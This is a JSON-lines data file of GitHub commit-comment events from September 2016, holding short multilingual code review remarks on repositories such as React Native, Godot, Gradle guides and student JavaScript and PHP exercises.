{"id":"4525740672","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":18923737,"position":27,"line":16,"path":"issue11/regist.php","commit_id":"c660213b9935079bf9ac89d9705a76527e5770b7","created_at":"2016-09-07T06:45:48Z","updated_at":"2016-09-07T06:45:48Z","body":"ここ書籍を参考にされた場所かと想像しております。\r\nどの書籍を参考にされたのか教えていただければ嬉しいです。"}},"created_at":"2016-09-07T06:45:48Z"}
{"id":"4525743859","type":"CommitCommentEvent","actor":{"login":"TakaraShinya"},"repo":{"name":"mnagaku/fullbok"},"payload":{"comment":{"id":18923744,"position":null,"line":null,"path":null,"commit_id":"2a3a770f9ba4ee9a58a9a94f699122dd48fa294d","created_at":"2016-09-07T06:46:45Z","updated_at":"2016-09-07T06:46:45Z","body":"fork元と同様に、下記のエラーが起きてしまいました。。。\r\nこのテンプレートで問題なく起動できますでしょうか？\r\n\r\n- [SlaveInstanceLaunchConfig Connection Error · Issue #13 · classmethod-aws/fullbok](https://github.com/classmethod-aws/fullbok/issues/13)\r\n"}},"created_at":"2016-09-07T06:46:45Z"}
{"id":"4525745603","type":"CommitCommentEvent","actor":{"login":"Eugene1992"},"repo":{"name":"Eugene1992/java-starter-12"},"payload":{"comment":{"id":18923746,"position":4,"line":5,"path":"gleb/src/main/java/Main.java","commit_id":"d39f4a51c023e6d3e28b998b2f67ca81173d57f5","created_at":"2016-09-07T06:47:15Z","updated_at":"2016-09-07T06:47:15Z","body":"WTF is here?"}},"created_at":"2016-09-07T06:47:15Z"}
{"id":"4525745612","type":"CommitCommentEvent","actor":{"login":"marialbst"},"repo":{"name":"marialbst/test-repo"},"payload":{"comment":{"id":18923747,"position":null,"line":null,"path":null,"commit_id":"2ca9312062764923b57e6922dbf70862e8ac2b06","created_at":"2016-09-07T06:47:15Z","updated_at":"2016-09-07T06:47:15Z","body":"# comment 1"}},"created_at":"2016-09-07T06:47:15Z"}
{"id":"4525746789","type":"CommitCommentEvent","actor":{"login":"ayaz4444"},"repo":{"name":"ayaz4444/myfirstrep"},"payload":{"comment":{"id":18923751,"position":null,"line":null,"path":null,"commit_id":"91a38bef8f9b4fe919d470c3ae1b6d083ed4068d","created_at":"2016-09-07T06:47:36Z","updated_at":"2016-09-07T06:47:36Z","body":"I have created my first repositry"}},"created_at":"2016-09-07T06:47:36Z"}
{"id":"4525747750","type":"CommitCommentEvent","actor":{"login":"pledbrook"},"repo":{"name":"gradle-guides/gs-building-java-libraries"},"payload":{"comment":{"id":18923755,"position":null,"line":null,"path":null,"commit_id":"8db3c0591ee2f8c81936b63c90e220463d56b9ff","created_at":"2016-09-07T06:47:53Z","updated_at":"2016-09-07T06:47:53Z","body":"Creating a new Java library project is a standard feature of Java IDEs. I don't see why we would need to explain how to do that. Crucially, we don't want to imply that you can't create a project via the IDE by not mentioning it.\r\n\r\nI'm not wedded to bringing up IDEs here."}},"created_at":"2016-09-07T06:47:53Z"}
{"id":"4525748633","type":"CommitCommentEvent","actor":{"login":"ide"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":18923760,"position":null,"line":null,"path":null,"commit_id":"bd60d828c5fc9cb066e5f647c87ecd6f70cb63a5","created_at":"2016-09-07T06:48:08Z","updated_at":"2016-09-07T06:48:08Z","body":"That's an implementation detail of fbjs and react, not part of their public interfaces. If you'd rather write `import 'emptyFunction'` you should use the same trick used in this commit and write your own stub file that defines `emptyFunction` and imports `fbjs/lib/emptyFunction`."}},"created_at":"2016-09-07T06:48:08Z"}
{"id":"4525751473","type":"CommitCommentEvent","actor":{"login":"aeolyus"},"repo":{"name":"EVSD/EVSD-SITE"},"payload":{"comment":{"id":18923772,"position":null,"line":null,"path":null,"commit_id":"1e3ae350328243e850cc190d8c1fe025126e873e","created_at":"2016-09-07T06:48:59Z","updated_at":"2016-09-07T06:48:59Z","body":"Need to test with smtp"}},"created_at":"2016-09-07T06:48:59Z"}
{"id":"4525753476","type":"CommitCommentEvent","actor":{"login":"cymplecy"},"repo":{"name":"cymplecy/scratch_gpio"},"payload":{"comment":{"id":18923788,"position":16,"line":49,"path":"scratchgpio_handler8.py","commit_id":"9b5f9465d865a319f975b4711eaab4e91e8ffbd8","created_at":"2016-09-07T06:49:36Z","updated_at":"2016-09-07T06:49:36Z","body":"Just debugging print statements so I know that its got past the import and the init points :)\r\n"}},"created_at":"2016-09-07T06:49:36Z"}
{"id":"4525754170","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":18923790,"position":20,"line":13,"path":"issue11/result.php","commit_id":"c660213b9935079bf9ac89d9705a76527e5770b7","created_at":"2016-09-07T06:49:48Z","updated_at":"2016-09-07T06:49:48Z","body":"WHERE 1について\r\n\r\nhttps://php1st.com/1354/"}},"created_at":"2016-09-07T06:49:48Z"}
{"id":"4525754925","type":"CommitCommentEvent","actor":{"login":"pledbrook"},"repo":{"name":"gradle-guides/gs-building-java-libraries"},"payload":{"comment":{"id":18923793,"position":24,"line":68,"path":"README.adoc","commit_id":"96ef2c8f4da5cb2d7cfe86debd8b71771f875a57","created_at":"2016-09-07T06:50:00Z","updated_at":"2016-09-07T06:50:00Z","body":"Not sure why you removed the \"in Gradle\", since now the following items are grammatically incorrect."}},"created_at":"2016-09-07T06:50:00Z"}
{"id":"4525762227","type":"CommitCommentEvent","actor":{"login":"andreaskoch"},"repo":{"name":"cheggaaa/pb"},"payload":{"comment":{"id":18923803,"position":38,"line":88,"path":"pb.go","commit_id":"7f4253899ba18226b3c52aca004d298182360edc","created_at":"2016-09-07T06:52:11Z","updated_at":"2016-09-07T06:52:11Z","body":"This will write the finish message to `os.Stdout`.\r\nWouldn't is be better to use the following instead?\r\n\r\n```go\r\nfmt.Fprintf(pb.Output, \"%s\\n\", str)\r\n```"}},"created_at":"2016-09-07T06:52:11Z"}
{"id":"4525768219","type":"CommitCommentEvent","actor":{"login":"pledbrook"},"repo":{"name":"gradle-guides/gs-building-java-libraries"},"payload":{"comment":{"id":18923812,"position":34,"line":77,"path":"README.adoc","commit_id":"96ef2c8f4da5cb2d7cfe86debd8b71771f875a57","created_at":"2016-09-07T06:53:56Z","updated_at":"2016-09-07T06:53:56Z","body":"I work on the basis you should always put callouts/admonitions between paragraphs where possible. It typically looks awkward otherwise. In this particular case, it's a bit of a toss up because the pushing the note later leaves it looking a little out of place in terms of the way this section reads."}},"created_at":"2016-09-07T06:53:56Z"}
{"id":"4525769104","type":"CommitCommentEvent","actor":{"login":"vganapath"},"repo":{"name":"smurugap/tempest"},"payload":{"comment":{"id":18923814,"position":8,"line":112,"path":"run_contrail_tempest.sh","commit_id":"df87d58207e71ec15a8380eb306fae52fed7ece0","created_at":"2016-09-07T06:54:12Z","updated_at":"2016-09-07T06:54:12Z","body":"\r\nI wanted to talk to you regarding this, but given this for testing.\r\n\r\nwhile executing the following it was failing\r\n\r\napt-get install -y git sshpass gcc libxml2-dev libxslt-dev python-dev libffi-dev libssl-dev\r\n\r\nit requires apt-get update\r\n\r\nwhen I did apt-get update, it was failing because the provision changes the sources.list..\r\nI took the copy of sources.list.save to sources.list\r\n\r\nLet me know your suggestions.\r\n\r\nThx and Regds\r\nVinoth Ganapathy\r\nvganapathy@juniper.net<mailto:vganapathy@juniper.net>\r\n\r\n\r\n\r\n\r\nOn Sep 6, 2016, at 10:42 PM, Senthilnathan Murugappan <notifications@github.com<mailto:notifications@github.com>> wrote:\r\n\r\n\r\nVinoth,\r\nWhy do we need sources.list?\r\nMoreover it should be a relative path and not absolute.\r\n\r\n—\r\nYou are receiving this because you authored the thread.\r\nReply to this email directly, view it on GitHub<https://github.com/smurugap/tempest/commit/df87d58207e71ec15a8380eb306fae52fed7ece0#commitcomment-18923291>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AQBwB_BKZgyR6hPchl7hIXZusPoJYyj2ks5qnk7PgaJpZM4J2jeh>.\r\n\r\n"}},"created_at":"2016-09-07T06:54:12Z"}
{"id":"4525773221","type":"CommitCommentEvent","actor":{"login":"pledbrook"},"repo":{"name":"gradle-guides/gs-building-java-libraries"},"payload":{"comment":{"id":18923822,"position":null,"line":null,"path":null,"commit_id":"63c4c0469a30c9429aabe5edd32e107d6c85456e","created_at":"2016-09-07T06:55:25Z","updated_at":"2016-09-07T06:55:25Z","body":"Something for the writing conventions guide. I favour double quotes in code except for map keys/named arguments. The above were double quotes because of copy & paste from user manual."}},"created_at":"2016-09-07T06:55:25Z"}
{"id":"4525775884","type":"CommitCommentEvent","actor":{"login":"nama1118"},"repo":{"name":"nama1118/test"},"payload":{"comment":{"id":18923827,"position":2,"line":1,"path":"index.html","commit_id":"1062bd13de5cb71f2b22b504b834956b8ac00536","created_at":"2016-09-07T06:56:14Z","updated_at":"2016-09-07T06:56:14Z","body":"h1じゃなくてh2がいいね"}},"created_at":"2016-09-07T06:56:14Z"}
{"id":"4525776654","type":"CommitCommentEvent","actor":{"login":"akien-mga"},"repo":{"name":"godotengine/godot"},"payload":{"comment":{"id":18923829,"position":136,"line":1275,"path":"scene/gui/line_edit.cpp","commit_id":"405f6af79c32c575768f53661127cfd6aa4230f4","created_at":"2016-09-07T06:56:24Z","updated_at":"2016-09-07T06:56:24Z","body":"Actually it's a bool, so should be `\"enabled\"`. Fixed with b48e623."}},"created_at":"2016-09-07T06:56:24Z"}
{"id":"4525777117","type":"CommitCommentEvent","actor":{"login":"nama1118"},"repo":{"name":"nama1118/test"},"payload":{"comment":{"id":18923830,"position":null,"line":null,"path":null,"commit_id":"1062bd13de5cb71f2b22b504b834956b8ac00536","created_at":"2016-09-07T06:56:33Z","updated_at":"2016-09-07T06:56:33Z","body":"@nama1118\r\n確認した1点修正をお願いします"}},"created_at":"2016-09-07T06:56:33Z"}
{"id":"4525777903","type":"CommitCommentEvent","actor":{"login":"LouisCAD"},"repo":{"name":"CodingDoug/white-label-event-app"},"payload":{"comment":{"id":18923831,"position":null,"line":null,"path":null,"commit_id":"917ff279febce1977635226fe9181cc1ff099656","created_at":"2016-09-07T06:56:46Z","updated_at":"2016-09-07T06:56:46Z","body":"I see, thanks for the explanation!"}},"created_at":"2016-09-07T06:56:46Z"}
{"id":"4525778125","type":"CommitCommentEvent","actor":{"login":"hdfukuoka1985"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":18923832,"position":null,"line":null,"path":null,"commit_id":"c660213b9935079bf9ac89d9705a76527e5770b7","created_at":"2016-09-07T06:56:50Z","updated_at":"2016-09-07T06:56:50Z","body":"書籍はこちらを参考にさせて頂きました。\r\nhttps://www.amazon.co.jp/%E3%81%84%E3%81%8D%E3%81%AA%E3%82%8A%E3%81%AF%E3%81%98%E3%82%81%E3%82%8BPHP~%E3%83%AF%E3%82%AF%E3%83%AF%E3%82%AF%E3%83%BB%E3%83%89%E3%82%AD%E3%83%89%E3%82%AD%E3%81%AE%E5%85%A5%E9%96%80%E6%95%99%E5%AE%A4~-%E8%B0%B7%E8%97%A4%E8%B3%A2%E4%B8%80/dp/4897978858"}},"created_at":"2016-09-07T06:56:50Z"}
{"id":"4525778820","type":"CommitCommentEvent","actor":{"login":"pledbrook"},"repo":{"name":"gradle-guides/gs-building-java-libraries"},"payload":{"comment":{"id":18923835,"position":null,"line":null,"path":null,"commit_id":"a6e357ce9fbf29353c3938231d67cbd19243d7be","created_at":"2016-09-07T06:57:03Z","updated_at":"2016-09-07T06:57:03Z","body":"Is composite build a natural progression from this guide? Seems marginal to me."}},"created_at":"2016-09-07T06:57:03Z"}
{"id":"4525779698","type":"CommitCommentEvent","actor":{"login":"khoaakt"},"repo":{"name":"os-js/OS.js"},"payload":{"comment":{"id":18923838,"position":null,"line":null,"path":null,"commit_id":"9aecfdd73a26a2102d5279de4342a98c1bed896f","created_at":"2016-09-07T06:57:18Z","updated_at":"2016-09-07T06:57:18Z","body":"lol 😄 "}},"created_at":"2016-09-07T06:57:18Z"}
{"id":"4525782731","type":"CommitCommentEvent","actor":{"login":"mahyarap"},"repo":{"name":"utailab/cs-portal"},"payload":{"comment":{"id":18923845,"position":null,"line":null,"path":null,"commit_id":"0028a3bd9993b548aabb814aed446f91eb57412a","created_at":"2016-09-07T06:58:12Z","updated_at":"2016-09-07T06:58:12Z","body":"It's not definitely the profile view's final version. I just wanted to wire up some thing as simple as possible to be understandable by all the team. "}},"created_at":"2016-09-07T06:58:12Z"}
{"id":"4525784193","type":"CommitCommentEvent","actor":{"login":"pledbrook"},"repo":{"name":"gradle-guides/gs-building-java-libraries"},"payload":{"comment":{"id":18923851,"position":5,"line":27,"path":"build.gradle","commit_id":"6e3c5380d6db76e94793de0517063757efc83099","created_at":"2016-09-07T06:58:36Z","updated_at":"2016-09-07T06:58:36Z","body":"Is this a proposed change to the main docs? It's odd to call it a language reference here when the docs themselves use DSL Reference."}},"created_at":"2016-09-07T06:58:36Z"}
{"id":"4525785643","type":"CommitCommentEvent","actor":{"login":"YorshA"},"repo":{"name":"ualalasocial/ualalasocial.github.io"},"payload":{"comment":{"id":18923854,"position":null,"line":null,"path":null,"commit_id":"acfe84f555bf1e5fd0659c1be48e0a95e4b222a0","created_at":"2016-09-07T06:59:01Z","updated_at":"2016-09-07T06:59:01Z","body":"estaria bueno por aca poner el articulo del libro, que es la historia detallada de Ualala y definir esto no como \"historia reciente\" sino como una \"breve reseña histórica\" o algo así..."}},"created_at":"2016-09-07T06:59:01Z"}
{"id":"4525785956","type":"CommitCommentEvent","actor":{"login":"hdfukuoka1985"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":18923857,"position":null,"line":null,"path":null,"commit_id":"c660213b9935079bf9ac89d9705a76527e5770b7","created_at":"2016-09-07T06:59:07Z","updated_at":"2016-09-07T06:59:07Z","body":"書籍はこちらを参考にさせて頂きました。\r\nhttps://www.amazon.co.jp/%E3%81%84%E3%81%8D%E3%81%AA%E3%82%8A%E3%81%AF%E3%81%98%E3%82%81%E3%82%8BPHP~%E3%83%AF%E3%82%AF%E3%83%AF%E3%82%AF%E3%83%BB%E3%83%89%E3%82%AD%E3%83%89%E3%82%AD%E3%81%AE%E5%85%A5%E9%96%80%E6%95%99%E5%AE%A4~-%E8%B0%B7%E8%97%A4%E8%B3%A2%E4%B8%80/dp/4897978858\r\n\r\n特に元の書き方が良くないという記述はありませんでしたが、書籍の内容に沿って進めた形です。"}},"created_at":"2016-09-07T06:59:07Z"}
{"id":"4525788717","type":"CommitCommentEvent","actor":{"login":"pledbrook"},"repo":{"name":"gradle-guides/gs-building-java-libraries"},"payload":{"comment":{"id":18923862,"position":8,"line":145,"path":"README.adoc","commit_id":"6e3c5380d6db76e94793de0517063757efc83099","created_at":"2016-09-07T06:59:50Z","updated_at":"2016-09-07T06:59:50Z","body":"Is this sensible? My main concern is that it sends users down the rabbit hole of configuring tasks. If we don't link to documentation on that, I'm not sure we should link to the `Jar`-specific stuff."}},"created_at":"2016-09-07T06:59:50Z"}
{"id":"4525791165","type":"CommitCommentEvent","actor":{"login":"chrisprice"},"repo":{"name":"ColinEberhardt/d3fc-annotation"},"payload":{"comment":{"id":18923878,"position":5,"line":3,"path":"README.md","commit_id":"b9b74e26ce9da35934111c281e6316aa35709b0f","created_at":"2016-09-07T07:00:28Z","updated_at":"2016-09-07T07:00:28Z","body":"Yes I've changed it to mention they're coming soon, I'll also reflect it in their naming."}},"created_at":"2016-09-07T07:00:28Z"}
{"id":"4525793433","type":"CommitCommentEvent","actor":{"login":"yhy18202828781"},"repo":{"name":"yhy18202828781/first"},"payload":{"comment":{"id":18923887,"position":67,"line":67,"path":"financial/index.php","commit_id":"777a40fdab0c8468a26e7abb1a60c60c782019d8","created_at":"2016-09-07T07:00:58Z","updated_at":"2016-09-07T07:00:58Z","body":"ssss"}},"created_at":"2016-09-07T07:00:58Z"}
{"id":"4525793449","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"AlejandroMagual/spicedacademy"},"payload":{"comment":{"id":18923888,"position":8,"line":8,"path":"wk2/Day2/Excercise2/Excercise2.js","commit_id":"1520e7ea4b49e179f0da4898073dcc3c7e00d973","created_at":"2016-09-07T07:00:59Z","updated_at":"2016-09-07T07:00:59Z","body":"One small problem with this approach is that the user might hit back space or select some text and type over it.    Such things would result in an input event firing but the length of the string would no longer correspond to `index`. To avoid this, you can check the length of the textarea's value with every input event."}},"created_at":"2016-09-07T07:00:59Z"}
{"id":"4525796518","type":"CommitCommentEvent","actor":{"login":"liujinfu"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":18923890,"position":null,"line":null,"path":null,"commit_id":"2e8d027a9e8cd693b67332ef0464deda65751439","created_at":"2016-09-07T07:01:42Z","updated_at":"2016-09-07T07:01:42Z","body":"The official website is not update yet."}},"created_at":"2016-09-07T07:01:42Z"}
{"id":"4525796727","type":"CommitCommentEvent","actor":{"login":"khuedoan"},"repo":{"name":"NhatNamBe/timshop.vn"},"payload":{"comment":{"id":18923891,"position":null,"line":null,"path":null,"commit_id":"4c4debd7c7b21bddfadb01e2204f9819ff036d6b","created_at":"2016-09-07T07:01:47Z","updated_at":"2016-09-07T07:01:47Z","body":"comment dau`"}},"created_at":"2016-09-07T07:01:47Z"}
{"id":"4525798156","type":"CommitCommentEvent","actor":{"login":"m-kuhn"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":18923892,"position":null,"line":null,"path":null,"commit_id":"9ccbe179a463bff06d3cd645504bffcbf952a041","created_at":"2016-09-07T07:02:12Z","updated_at":"2016-09-07T07:02:12Z","body":"Would be nice to let the actions emit a signal when they have finished"}},"created_at":"2016-09-07T07:02:12Z"}
{"id":"4525799272","type":"CommitCommentEvent","actor":{"login":"m-kuhn"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":18923894,"position":null,"line":null,"path":null,"commit_id":"9ccbe179a463bff06d3cd645504bffcbf952a041","created_at":"2016-09-07T07:02:28Z","updated_at":"2016-09-07T07:02:28Z","body":"But thanks a lot!"}},"created_at":"2016-09-07T07:02:28Z"}
{"id":"4525799325","type":"CommitCommentEvent","actor":{"login":"11mb"},"repo":{"name":"JacobDrummond/Magento2-Product-Downloads"},"payload":{"comment":{"id":18923895,"position":34,"line":34,"path":"Ui/DataProvider/Product/Form/Modifier/Downloads.php","commit_id":"93bf79267e7094b44002e042ec2fb372ea9fa822","created_at":"2016-09-07T07:02:29Z","updated_at":"2016-09-07T07:02:29Z","body":"I looked into this code, and it seems that this is a bug in magento? Is there an issue regarding the fact that these fileuploads don't get a name in html?"}},"created_at":"2016-09-07T07:02:29Z"}
{"id":"4525806164","type":"CommitCommentEvent","actor":{"login":"xcxxcc"},"repo":{"name":"xcxxcc/learngit"},"payload":{"comment":{"id":18923912,"position":2,"line":2,"path":"xc.txt","commit_id":"10c2c5064f1061bd9cbd0a691010baba74a56261","created_at":"2016-09-07T07:04:24Z","updated_at":"2016-09-07T07:04:24Z","body":"ss\r\n"}},"created_at":"2016-09-07T07:04:24Z"}
{"id":"4525807719","type":"CommitCommentEvent","actor":{"login":"iperdomo"},"repo":{"name":"akvo/akvo-lumen"},"payload":{"comment":{"id":18923917,"position":2,"line":2,"path":"backend/dev_helpers/bash/headers.sh","commit_id":"225cedcab44e70541368eabf12da31bf63203094","created_at":"2016-09-07T07:04:52Z","updated_at":"2016-09-07T07:04:52Z","body":"`set -e` at the beginning could help to avoid silent errors"}},"created_at":"2016-09-07T07:04:52Z"}
{"id":"4525807960","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18923919,"position":null,"line":null,"path":null,"commit_id":"2b2ac333dd867b7821e60c420ac45420f6eb9ddf","created_at":"2016-09-07T07:04:56Z","updated_at":"2016-09-07T07:04:56Z","body":"Sorry, must test in real plugin , but no time actually . But seems OK (for starting ;) )"}},"created_at":"2016-09-07T07:04:56Z"}
{"id":"4525810149","type":"CommitCommentEvent","actor":{"login":"pledbrook"},"repo":{"name":"gradle-guides/gs-building-java-libraries"},"payload":{"comment":{"id":18923923,"position":10,"line":8,"path":"README.adoc","commit_id":"0fbe0eff761a43784f6d49c928179bb4a3689312","created_at":"2016-09-07T07:05:30Z","updated_at":"2016-09-07T07:05:30Z","body":"We're not teaching people about Java projects, so I'm not sure it's at all useful to link to Oracle docs on what a JAR is."}},"created_at":"2016-09-07T07:05:30Z"}
{"id":"4525818438","type":"CommitCommentEvent","actor":{"login":"iperdomo"},"repo":{"name":"akvo/akvo-lumen"},"payload":{"comment":{"id":18923948,"position":3,"line":3,"path":"backend/dev_helpers/bash/headers.sh","commit_id":"225cedcab44e70541368eabf12da31bf63203094","created_at":"2016-09-07T07:07:40Z","updated_at":"2016-09-07T07:07:40Z","body":"you can _prepend_ `readonly` to this variables to avoid changing them. \r\n* http://www.tldp.org/LDP/Bash-Beginners-Guide/html/sect_10_01.html#sect_10_01_03"}},"created_at":"2016-09-07T07:07:40Z"}
{"id":"4525819952","type":"CommitCommentEvent","actor":{"login":"3lvis"},"repo":{"name":"hyperoslo/Sync"},"payload":{"comment":{"id":18923950,"position":null,"line":null,"path":null,"commit_id":"71388d3377a39b3b0d2a2ba2e4bb4a960434fd80","created_at":"2016-09-07T07:08:06Z","updated_at":"2016-09-07T07:08:06Z","body":"❤️ !"}},"created_at":"2016-09-07T07:08:06Z"}
{"id":"4525829282","type":"CommitCommentEvent","actor":{"login":"warmhug"},"repo":{"name":"ant-design/ant-design-mobile"},"payload":{"comment":{"id":18923963,"position":null,"line":null,"path":null,"commit_id":"a33e7de24caa13013872bc2aaedd053c85578478","created_at":"2016-09-07T07:10:44Z","updated_at":"2016-09-07T07:10:44Z","body":"fixed #222"}},"created_at":"2016-09-07T07:10:44Z"}
{"id":"4525834431","type":"CommitCommentEvent","actor":{"login":"ide"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":18923975,"position":null,"line":null,"path":null,"commit_id":"2e8d027a9e8cd693b67332ef0464deda65751439","created_at":"2016-09-07T07:12:08Z","updated_at":"2016-09-07T07:12:08Z","body":"The website updates every two weeks with each release."}},"created_at":"2016-09-07T07:12:08Z"}
{"id":"4525838898","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"juliendubrail/julien_spices"},"payload":{"comment":{"id":18923981,"position":11,"line":11,"path":"wk2/d7ex2/script.js","commit_id":"d06faa2c464ef923e7bbf243c7ffdaf77b91e36e","created_at":"2016-09-07T07:13:23Z","updated_at":"2016-09-07T07:13:23Z","body":"One small problem with this approach is that input events can happen when the user hits backspace or selects text and cuts it out or types over it. In such cases `counter` would no longer correspond to the length of what the user has actually input. This problem can be avoided by checking the length of the textarea's value with every input event"}},"created_at":"2016-09-07T07:13:23Z"}
{"id":"4525839828","type":"CommitCommentEvent","actor":{"login":"bbinet"},"repo":{"name":"mozilla-services/lua_sandbox_extensions"},"payload":{"comment":{"id":18923983,"position":7,"line":43,"path":"socket/sandboxes/heka/output/heka_tcp_matcher.lua","commit_id":"3257f0838766902ed148a2c99022263835380eec","created_at":"2016-09-07T07:13:37Z","updated_at":"2016-09-07T07:13:37Z","body":"I guess you should `require \"table\"` here too."}},"created_at":"2016-09-07T07:13:37Z"}
{"id":"4525842689","type":"CommitCommentEvent","actor":{"login":"frangarcj"},"repo":{"name":"skogaby/mupen64plus-libretro"},"payload":{"comment":{"id":18923987,"position":null,"line":null,"path":null,"commit_id":"efe39ace648f68ee3d0b5096f2438ee7a9183327","created_at":"2016-09-07T07:14:20Z","updated_at":"2016-09-07T07:14:20Z","body":"There is a small bug on libco with scefiber\r\n\r\nPlease update again"}},"created_at":"2016-09-07T07:14:20Z"}
{"id":"4525843428","type":"CommitCommentEvent","actor":{"login":"tripu"},"repo":{"name":"w3c/i18n-checker"},"payload":{"comment":{"id":18923990,"position":null,"line":null,"path":null,"commit_id":"6ba79ef40b545e3391fb6ac7d1aa970ef4cbf424","created_at":"2016-09-07T07:14:32Z","updated_at":"2016-09-07T07:14:32Z","body":"I thought we meant every change, @r12a. Even minor editorial changes can include typos, omissions, inaccuracies, broken links&hellip; which benefit from peer review too.\r\n\r\nBut it's not a strong requirement, only a recommendation of mine. Let's go as you prefer :)"}},"created_at":"2016-09-07T07:14:32Z"}
{"id":"4525844484","type":"CommitCommentEvent","actor":{"login":"mikejolley"},"repo":{"name":"woothemes/woocommerce"},"payload":{"comment":{"id":18923995,"position":null,"line":null,"path":null,"commit_id":"e2d206421d8b47adc622e4e56d72e939da48ca71","created_at":"2016-09-07T07:14:47Z","updated_at":"2016-09-07T07:14:47Z","body":"@tamarazuk \r\n\r\n> Also, note that many address validation solutions would automatically use the ZIP+4 code if one is appropriate.\r\n\r\nI don't think it's right to rely on end users to input the +4 version. It does not sound common, and I know solutions like USPS break when it's used.\r\n\r\nWe could strip it out if input?"}},"created_at":"2016-09-07T07:14:47Z"}
{"id":"4525848153","type":"CommitCommentEvent","actor":{"login":"kvz"},"repo":{"name":"tus/tus.io"},"payload":{"comment":{"id":18924004,"position":7,"line":8,"path":"package.json","commit_id":"87dddef513228ae549382e533732e7ba762aba00","created_at":"2016-09-07T07:15:49Z","updated_at":"2016-09-07T07:15:49Z","body":"Hey there, thanks for taking an interest. I admire lodash! It seems this is in error. The idea was to default to the development JEKYLL_ENV like so `${JEKYLL_ENV:-development}`, so that production builds could be made by running `env JEKYLL_ENV=production script`. I believe the Jekyll asset pipeline should then be able to generate compressed and minified asset bundles vs the developer versions. \r\n\r\nIt seems I never got around to nailing this bit, and it seems we're at least missing one `$` for this to work - and at worst, even with the `$` it won't work. \r\n\r\nI'm not the best at crafting websites but in my experience the jekyll asset building and file watching are not at a great place right now. I'm considering using node modules for that, and just passing incremental jekyll build commands for the content, and letting browser-sync serve `_site` for auto browser reloads. I did something similar here https://github.com/kvz/bash3boilerplate/blob/master/package.json#L21 and even though I'm not a fan of having more moving parts, bringing in the the node ecosystem for file watching & assets made everything much faster and reliable (and having played with hexo, middleman, metalsmith, I probably wouldn't quickly abandon Jekyll & liquid for the content part)\r\n\r\nAnyway, were you considering to contribute? I hope I didn't scare you away with this nightmare :) If you have ideas for improvement I'm all ears. Otherwise, I'll just fix the `$` for now, and _maybe_ port over that dual jekyll/npm thing if there's some time later on."}},"created_at":"2016-09-07T07:15:49Z"}
{"id":"4525848216","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"juliendubrail/julien_spices"},"payload":{"comment":{"id":18924006,"position":9,"line":9,"path":"wk2/d7ex3/script.js","commit_id":"d06faa2c464ef923e7bbf243c7ffdaf77b91e36e","created_at":"2016-09-07T07:15:50Z","updated_at":"2016-09-07T07:15:50Z","body":"I think this is resulting in a random color but there is a whole range of possible colors that are being excluded. I think what this code wants to do is get a random number between 0 and 15 and then select the character at that index in the string '0123456789abcdef' (or in an array of those characters) six times."}},"created_at":"2016-09-07T07:15:50Z"}
{"id":"4525851393","type":"CommitCommentEvent","actor":{"login":"kvz"},"repo":{"name":"tus/tus.io"},"payload":{"comment":{"id":18924011,"position":7,"line":8,"path":"package.json","commit_id":"87dddef513228ae549382e533732e7ba762aba00","created_at":"2016-09-07T07:16:40Z","updated_at":"2016-09-07T07:16:40Z","body":"Seems I already partially ported some of that as node handles file watching and browser syncing already 😱 "}},"created_at":"2016-09-07T07:16:40Z"}
{"id":"4525855118","type":"CommitCommentEvent","actor":{"login":"bbinet"},"repo":{"name":"mozilla-services/lua_sandbox_extensions"},"payload":{"comment":{"id":18924014,"position":7,"line":39,"path":"socket/sandboxes/heka/input/heka_tcp.lua","commit_id":"3257f0838766902ed148a2c99022263835380eec","created_at":"2016-09-07T07:17:40Z","updated_at":"2016-09-07T07:17:40Z","body":"Oh no, nevermind, `require \"table\"` is already there"}},"created_at":"2016-09-07T07:17:40Z"}
{"id":"4525858811","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"fredpinon/Fred"},"payload":{"comment":{"id":18924021,"position":10,"line":10,"path":"wk2/js_day2/ex2/ex2.js","commit_id":"d3e57c06802753ebd9ff79ed36b3c0996c40e04c","created_at":"2016-09-07T07:18:35Z","updated_at":"2016-09-07T07:18:35Z","body":"I think using a counter like this doesn't account for the fact that users can cause input events with actions that reduce the length of the string in the textarea. For example, they could hit the backspace key. This problem could be avoided by checking the length of the string in the textarea with every input event rather than maintaining a count of how many times the input event happens."}},"created_at":"2016-09-07T07:18:35Z"}
{"id":"4525858915","type":"CommitCommentEvent","actor":{"login":"ehmry"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18924022,"position":null,"line":null,"path":null,"commit_id":"39e197ab1ccad9f1b57c10afe4cfe592a9e40270","created_at":"2016-09-07T07:18:37Z","updated_at":"2016-09-07T07:18:37Z","body":"Works for me."}},"created_at":"2016-09-07T07:18:37Z"}
{"id":"4525863513","type":"CommitCommentEvent","actor":{"login":"Deamonor"},"repo":{"name":"Testfirma1337/DASleet"},"payload":{"comment":{"id":18924027,"position":1,"line":1,"path":"README.md","commit_id":"b530d008f043ad2b00a948e88d0d54366b516397","created_at":"2016-09-07T07:19:51Z","updated_at":"2016-09-07T07:19:51Z","body":"LOL Kack noob\r\n"}},"created_at":"2016-09-07T07:19:51Z"}
